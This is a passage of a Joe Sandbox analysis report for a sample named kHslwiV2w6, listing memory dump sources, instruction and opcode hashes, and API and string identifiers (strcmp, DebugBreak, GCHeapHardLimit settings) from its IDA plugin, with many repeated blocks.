                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CounterPerformanceQuery
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 2783962273-0
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 98840326572346ce62672058949bdb619bd28472bb45fe13b568a26b56bb2989
                                                                                                                                                                                                                                                                                  • Instruction ID: 70ff9c82748961624e1521b9545f918a473321944d76b90830af53f584486ae7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 98840326572346ce62672058949bdb619bd28472bb45fe13b568a26b56bb2989
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 95C13B36B09AC686E660AF16EC542FAA3E0FB49748FD80135DA4E47355DF3CE4618F20
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: eed20e039dcc1a7adb761facd62eb612643325d2ef7b125a1d3c58e3026f862f
                                                                                                                                                                                                                                                                                  • Instruction ID: 44974b7e87f5d0c4baa43d38bb32c6b208333f3ee63f0ffcf260ee114c860149
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eed20e039dcc1a7adb761facd62eb612643325d2ef7b125a1d3c58e3026f862f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37A1B163B0D29185E655AB12AD113BAF6ABFB80F94F885035EE8E167C4DB3CD481DF10
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 6f495caaedb7263532d1806f88f0ff8ac8a82c62e595ec08781830e007608e81
                                                                                                                                                                                                                                                                                  • Instruction ID: 2690caec99fa4e3fa4ffc89f9dab8bee65d0f653ce65aa4b2473d5fa4618e377
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6f495caaedb7263532d1806f88f0ff8ac8a82c62e595ec08781830e007608e81
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 19C19236B19AC682EA04AB4AED505B8B3A5FB487A0FC44237D97D47794CF3DE451CB20
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: e8839e0e3ad3752fbee51db35c45455f694ce765d77fd982f1e164920b5e77ec
                                                                                                                                                                                                                                                                                  • Instruction ID: 62694a0aaae96be82e00c5350df22a6ed0461c85d71fe7f19ca7849aedb7d559
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e8839e0e3ad3752fbee51db35c45455f694ce765d77fd982f1e164920b5e77ec
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B4B1AE62B1AAD582EA00EF16E8447A8B3E5FB44BA4F954236DA7D477C4DF3CE441CB10
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 96fea93f446af114b9064da49687705947baa9860f6c7a3c23dd91d3fd028b50
                                                                                                                                                                                                                                                                                  • Instruction ID: 4708949b3c250f8d0cc8f0c2299964769c36daaf723b2a8295498e250b24380b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 96fea93f446af114b9064da49687705947baa9860f6c7a3c23dd91d3fd028b50
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6F91B425F2AFCA86E547A7366C511F4D265EF6A7C1AD88372D81F32750EF2C70829920
Memory Dump Source
• Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmpDownload File
Memory Dump Source
• Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
• Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7ff72f5a0000_kHslwiV2w6.jbxd
                                                                                                                                                                                                                                                                                  • Instruction ID: 585a58051f09bf196d4fa4382f44e38334ebbb3a1f0a7df019842eaf08de0228
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8c3a55e49a23a19c6e99d4e2879a1303fdaddfc18d9bca4d098764dac0d00ba1
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9931A412B091C2C6EA14BA269D401FDD667FB84BC4FD48438ED1E47B96DE2CE9468B60
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
                                                                                                                                                                                                                                                                                  • Instruction ID: 9dc17695230150dbc418a00019b6a7a1ee4fa41fcf21ca5c4ed89a071d413d9b
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84561d1d573fde311a2d707e79fc372032f8b9738f604961ab49bf565c1bdabe
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6721C822B2868242FFA4AF3BAA916FE5361DB89780F842031DE1E03F56DD1DD5814E14
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 34987ce44795b5176388c7297ef07e80ac88c18db829327b6e44d208054dc68d
                                                                                                                                                                                                                                                                                  • Instruction ID: 4afc726e30c841459c796ba53706d8a7b973db7369635d242febb06d386e6ba7
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34987ce44795b5176388c7297ef07e80ac88c18db829327b6e44d208054dc68d
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D11C423B0628289E615BE12BC811F9D716FF957D1F948435EF1C4BB85CE3CD4918710
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fd73dc21319d55d5cd51ae119c2cd724b2eedb2a74dd1c6a194b4a6c8a9077be
                                                                                                                                                                                                                                                                                  • Instruction ID: 42c4e7025837a358b9ab8006ff6d2fc433597793c2389d3b6580408b15fe21cd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd73dc21319d55d5cd51ae119c2cd724b2eedb2a74dd1c6a194b4a6c8a9077be
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AAF03000F0A08646F80CBA735C162FAD267EF97B80FA06830EA1D1FB87DC2C94120B65
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: bb870c6da8980ab108728cb2512e603d96d3e36e6137f51798ee13c9ceab7c4e
                                                                                                                                                                                                                                                                                  • Instruction ID: 67474a926c693726e1dd0f3763818d8e29ef2fdbfecfa8d583316b9a3708541c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bb870c6da8980ab108728cb2512e603d96d3e36e6137f51798ee13c9ceab7c4e
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAE04F04F1A18746F90CBA625C662FAE167EF96B40FA41430EA1E1BB93DE2CA4114B60
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
                                                                                                                                                                                                                                                                                  • Instruction ID: 95726ec84d8e6089dda3b913844efc14a9414fc79767effbb47b4a742d68eca9
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 334c71db2373eca22ed1fe030cc8b17200d83776fff50a61cfaf6ec7c3de23df
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 46D05E04F2509A00EC047A234C250F6C165AF46FC0DD42030ED0E2BB96DD0C95124B58
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: _stricmp
                                                                                                                                                                                                                                                                                  • String ID: buddhist$calendar$dangi$gregorian$hebrew$islamic$islamic-umalqura$japanese$persian$roc
                                                                                                                                                                                                                                                                                  • API String ID: 2884411883-3649728362
                                                                                                                                                                                                                                                                                  • Opcode ID: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
                                                                                                                                                                                                                                                                                  • Instruction ID: 6cacc709760fe9881fa6fec594538fb5df6998d9049bdbc0ef4bef4dd3990859
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c4252158990072a2c8dbf7d618486f637b8a275c6e4f6a82dc01d2d222f2064
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 61514C25B1C6C351FA10AB19EE207F5E39AFF98784FD1203ADC0E46791EE6DE4458B60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC1DE
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC206
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC226
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC246
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC266
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC28A
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC2AE
                                                                                                                                                                                                                                                                                  • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FF72F5B2967,?,?,?,?,00007FF72F5AB845), ref: 00007FF72F5AC2D2
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: strcmp
                                                                                                                                                                                                                                                                                  • String ID: GCHeapHardLimit$GCHeapHardLimitLOH$GCHeapHardLimitLOHPercent$GCHeapHardLimitPOH$GCHeapHardLimitPOHPercent$GCHeapHardLimitPercent$GCHeapHardLimitSOH$GCHeapHardLimitSOHPercent
                                                                                                                                                                                                                                                                                  • API String ID: 1004003707-945519297
                                                                                                                                                                                                                                                                                  • Opcode ID: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
                                                                                                                                                                                                                                                                                  • Instruction ID: 0cebea3af1509fc5ccde3a3fd6a9b6c138553ff6045d1298c0b9a4f4b861d2d4
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bd652d5be0480d2eb31566d04321b99b92d141b06253939b4d1c7caa1d773059
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 97411A14B096C281EA50BB169D145F4D292FF05BF4FC80331D87D977D9EE6CE8528A60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: ContextInitialize$AddressEnabledErrorFeaturesHandleLastModuleProcState
                                                                                                                                                                                                                                                                                  • String ID: InitializeContext2$kernel32.dll
                                                                                                                                                                                                                                                                                  • API String ID: 4102459504-3117029998
                                                                                                                                                                                                                                                                                  • Opcode ID: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
                                                                                                                                                                                                                                                                                  • Instruction ID: 8b3710eeae5ce11e02066dae699554897b760ea4dbf0521ef5c05ad00546148f
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf7d35e48df714c612ab66266faaa2ff6652ce620ea3f11c073d427a00be551f
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B6315E25B09B8692EA10AB55ED402B9E392FF48790FC80435DD4D46754DF7CE496CB60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: Thread$AddressContextErrorLastLibraryLoadProcResumeSuspend
                                                                                                                                                                                                                                                                                  • String ID: QueueUserAPC2$kernel32
                                                                                                                                                                                                                                                                                  • API String ID: 3714266957-4022151419
                                                                                                                                                                                                                                                                                  • Opcode ID: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
                                                                                                                                                                                                                                                                                  • Instruction ID: db07b237ba134ce52106eb4175bcc46f183790d812037fd70dfbb3839f58d29c
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc70cecf5c74af7520f56920f6343e2be3003b4f5f30e659a0aacf61ab6d3dce
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 93319024B09AC281FA10AB16ED403F9A3A1FF45BA4FC40234CD6D46BE4DE6DE4168F60
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                  • Opcode ID: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
                                                                                                                                                                                                                                                                                  • Instruction ID: 76c0bd99e676e1764514a802d66eceb786d4a19b4e1fbe91e67a1a06b12843dd
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fe6e69181591d6301f79addf1851dae84baba91a0e20fc1957c0ed45eea2809c
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1E718D21B09AC252FA54BF229D402F9E7A5EF54B94FD80035DA4E07B9ADF3CE4508B70
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
                                                                                                                                                                                                                                                                                  • Instruction ID: d02b3f9fc6c3be738bb64419179c8b1e7ca108d1cc144945238e950677f14f47
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5d73b6675c1853df630bb6c88506b6e80ad5f9561737fbd2e3aae4c93d19f0ff
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 09519122B09AC296FA59AB52C8402FDE7A1FF84B94FC64135CA1D07391DE3CE581CB60
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: CriticalSectionSwitchThread$Leave$Enter
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 1765607624-0
                                                                                                                                                                                                                                                                                  • Opcode ID: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
                                                                                                                                                                                                                                                                                  • Instruction ID: 50e0d3976c5b6986738bee64c9488be3dd4661cc941cf211e8982ab324a4894e
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: faad790ec28286bda2ef36a915e46beff94c7fcad6aaa131053e1d9cfa2025f0
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 40513B34F0C6C386F654BF26AC415F5E291EF59B50FD54236E52E822E6CE2CB8419E70
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1E89
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1EA1
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1EB9
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1ED7
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(?,?,?,?,?,?,00007FF72F5E1FB1,?,?,000001ED04CFF520,00007FF72F5E14E2), ref: 00007FF72F5E1EFC
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32 ref: 00007FF72F5E1F30
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                  • API ID: BreakDebug
                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                  • API String ID: 456121617-0
                                                                                                                                                                                                                                                                                  • Opcode ID: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
                                                                                                                                                                                                                                                                                  • Instruction ID: 61e468b5036a30d6efaf6b47ddc7ed5066fe67bdcd5590bee8117868e3b393a0
                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: eb5a1da3c55d9acfe23894c72031d4decde521b88f1bcb182cc320728f4e60f2
                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 344196227096C151F7697B6298112FEEB91FF44B94F980034EE8D06696CF3CE480CBB1
                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F49
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F66
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F81
                                                                                                                                                                                                                                                                                  • DebugBreak.KERNEL32(@=},00000000,?,00007FF72F5BE7B5,?,?,0000000100000001,00007FF72F5CCA48), ref: 00007FF72F5E0F9A
                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.6840952422.00007FF72F5A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72F5A0000, based on PE: true
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6840916799.00007FF72F5A0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841158411.00007FF72F689000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841235738.00007FF72F6BA000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F721000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F727000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841338609.00007FF72F72C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.6841441464.00007FF72F72F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
